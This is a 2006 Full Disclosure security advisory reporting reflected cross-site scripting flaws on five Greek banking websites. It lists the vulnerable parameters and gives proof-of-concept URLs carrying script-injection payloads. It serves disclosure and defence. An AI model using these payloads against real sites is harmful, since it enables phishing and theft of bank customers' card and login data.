Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Cross Site Scripting at Several Greek Banks.

From: "Sentinel" <info () sentinel gr>
Date: Wed, 20 Sep 2006 09:59:15 +0300
                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info () sentinel gr


General Flaw Description : Cross Site Scripting Vulnerabilities in multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phising and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil () sentinel gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

Many Greek banks are using Web Banking service to assist their customers with 
their transactions. Eurobank, Winbank, Pireaus Bank, Probank and Emporiki Bank 
found to be vulnerable to Cross Site Scripting Attacks which can lead to 
execution of arbitrary SCRIPT and HTML code to the user. 


Technical Information
---------------------

www.eurobank.gr is making use of multiple aspx files which fail to sanitise
variables. Most of aspx files in Eurobank website which are getting variables
as input are vulnerable to XSS.

www.winbank.gr is using a search function which does not properly sanitise the
input of variable text_search.

www.emporiki.gr is using a jsp search function which does not properly sanitise
the input of variable searchFld.

www.piraeusbank.gr is having exactly the same problem with Winbank as it is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site Scripting
is possible, and thus the danger is the same, as an unsuspicious user can be
lead from www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service but the site is vulnerable
to XSS and while account compromise is not possible, valuable information such
as CARD and PIN numbers can be stolen through phising/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}


Patch Description and Information
---------------------------------

Banks informed. All banks except Emporiki Bank have fixed the vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: